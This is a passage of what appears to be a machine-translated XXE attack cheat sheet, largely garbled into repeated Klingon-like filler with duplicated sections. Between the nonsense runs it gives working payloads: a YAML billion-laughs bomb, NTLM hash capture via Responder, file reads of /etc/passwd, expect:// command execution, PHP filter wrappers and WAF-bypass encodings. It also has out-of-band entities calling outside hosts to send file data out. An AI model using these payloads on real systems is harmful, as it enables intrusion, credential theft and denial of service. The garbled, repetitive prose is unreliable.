vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhu
```xml
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
#### tlhIngan Hol

![](<../.gitbook/assets/image (531).png>)

#### NTML jatlh

Windows hostpu'wIj web server user NTML hash laH responder.py handler set vItlhutlh.
```bash
Responder.py -I eth0 -v
```
and by sending the following request
```xml
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM 'file://///attackerIp//randomDir/random.jpg'> ]>
<data>&example;</data>
```
## qawHaq XXE Surfaces

### XInclude

ghItlh XML qel DIvI' ghaH xml documents, backend SOAP requests, client data jImej, xml structure XML modify 'ej 'ach xml attacks XXE traditional hindering limited, 'ej 'ach 'ej external entities insertion allowing 'ej xml document data element. method effective xml document server-generated controlled data portion only when.

'ej xml attack 'ej, 'ej intended external entity file path specified must be declared, 'ej XInclude namespace. example succinct formulated attack such qar:
```xml
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
```
### SVG - File Upload

Files uploaded by users to certain applications, which are then processed on the server, can exploit vulnerabilities in how XML or XML-containing file formats are handled. Common file formats like office documents (DOCX) and images (SVG) are based on XML.

When users **upload images**, these images are processed or validated server-side. Even for applications expecting formats such as PNG or JPEG, the **server's image processing library might also support SVG images**. SVG, being an XML-based format, can be exploited by attackers to submit malicious SVG images, thereby exposing the server to XXE (XML External Entity) vulnerabilities.

An example of such an exploit is shown below, where a malicious SVG image attempts to read system files:

### SVG - File Upload

Users' uploaded files can be used to exploit vulnerabilities in XML or XML-containing file formats. Common file formats like office documents (DOCX) and images (SVG) are based on XML.

When users **upload images**, these images are processed or validated on the server. Even if the application expects formats like PNG or JPEG, the **server's image processing library may also support SVG images**. Attackers can exploit SVG, which is an XML-based format, by submitting malicious SVG images, thus exposing the server to XXE (XML External Entity) vulnerabilities.

An example of such an exploit is shown below, where a malicious SVG image attempts to read system files:
```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"><image xlink:href="file:///etc/hostname"></image></svg>
```
**jIyajbe'chugh** **DIvI'** **PHP "expect" wrapper** **lo'wI'** **command** **execute** **attempting** **involves** **method** **Another**:
```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image>
</svg>
```
In both instances, the SVG format is used to launch attacks that exploit the XML processing capabilities of the server's software, highlighting the need for robust input validation and security measures.

Check [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) for more info!

**Note the first line of the read file or of the result of the execution will appear INSIDE the created image. So you need to be able to access the image SVG has created.**

### **PDF - File upload**

Read the following post to **learn how to exploit a XXE uploading a PDF** file:

{% content-ref url="file-upload/pdf-upload-xxe-and-cors-bypass.md" %}
[pdf-upload-xxe-and-cors-bypass.md](file-upload/pdf-upload-xxe-and-cors-bypass.md)
{% endcontent-ref %}

### Content-Type: From x-www-urlencoded to XML

If a POST request accepts the data in XML format, you could try to exploit a XXE in that request. For example, if a normal request contains the following:
```xml
POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

foo=bar
```
DaH jImej, 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ejwI' 'ej
```xml
POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52

<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>
```
### Content-Type: From JSON to XEE

To change the request you could use a Burp Extension named "**Content Type Converter**". [Here](https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html) you can find this example:

### Content-Type: JSON to XEE

To change the request you could use a Burp Extension named "**Content Type Converter**". [Here](https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html) you can find this example:
```xml
Content-Type: application/json;charset=UTF-8

{"root": {"root": {
"firstName": "Avinash",
"lastName": "",
"country": "United States",
"city": "ddd",
"postalCode": "ddd"
}}}
```

```xml
Content-Type: application/xml;charset=UTF-8

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://34.229.92.127:8000/TEST.ext" >]>
<root>
<root>
<firstName>&xxe;</firstName>
<lastName/>
<country>United States</country>
<city>ddd</city>
<postalCode>ddd</postalCode>
</root>
</root>
```
**Qapla'!** [Qap](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2) **'ej** 'oH **ghItlh!**

## WAF 'ej Protections Bypasses

### Base64
```xml
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
```
**This only work if the XML server accepts the `data://` protocol.**

### UTF-7

You can use the \[**"Encode Recipe**" of cyberchef here ]\(\[[https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7) %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to]\([https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7 %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28%27UTF-7%20%2865000%29%27%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to)) transform to UTF-7.
```xml
<!xml version="1.0" encoding="UTF-7"?-->
+ADw-+ACE-DOCTYPE+ACA-foo+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-example+ACA-SYSTEM+ACA-+ACI-/etc/passwd+ACI-+AD4-+ACA-+AF0-+AD4-+AAo-+ADw-stockCheck+AD4-+ADw-productId+AD4-+ACY-example+ADs-+ADw-/productId+AD4-+ADw-storeId+AD4-1+ADw-/storeId+AD4-+ADw-/stockCheck+AD4-
```

```xml
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
```
### File:/ Protocol Bypass

If the web is using PHP, instead of using `file:/` you can use **php wrappers**`php://filter/convert.base64-encode/resource=` to **access internal files**.

If the web is using Java you may check the [**jar: protocol**](xxe-xee-xml-external-entity.md#jar-protocol).

### HTML Entities

Trick from [**https://github.com/Ambrotd/XXE-Notes**](https://github.com/Ambrotd/XXE-Notes)\
You can create an **entity inside an entity** encoding it with **html entities** and then call it to **load a dtd**.\
Note that the **HTML Entities** used needs to be **numeric** (like \[in this example]\([https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,%27Numeric%20entities%27%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B\)%5C)).
```xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "&#x3C;&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x25;&#x64;&#x74;&#x64;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x3E;" >%a;%dtd;]>
<data>
<env>&exfil;</env>
</data>
```
DTD jatlh:
```xml
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
```
```
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
```
```xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/flag">
<!ENTITY % abt "<!ENTITY exfil SYSTEM 'http://172.17.0.1:7878/bypass.xml?%data;'>">
%abt;
%exfil;
```
## PHP Wrappers

### Base64

**Extract** _**index.php**_
```xml
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
```
#### **QawHaq 'ej QaD xml**
```xml
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3"> ]>
```
### Remote code execution

**If PHP "expect" module is loaded**

### qarDaSmoHwI' 

**PHP "expect" module lo'laHbe'chugh**
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
```
## **SOAP - XEE**
```xml
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
```
## XLIFF - XXE

**tlhIngan Hol** - XXE

ghItlhvam: [https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe](https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe) jImej.

XLIFF (XML Localization Interchange File Format) vItlhutlhlaH xml Daq pagh xml-based format vItlhutlhlaH, vaj xml-based format vItlhutlhlaH, xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhutlhlaH xml-based format vItlhut
```xml
------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="file"; filename="xxe.xliff"
Content-Type: application/x-xliff+xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE XXE [
<!ENTITY % remote SYSTEM "http://redacted.burpcollaborator.net/?xxe_test"> %remote; ]>
<xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--
```
DaH jatlhpu' 'e' vItlhutlh. vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 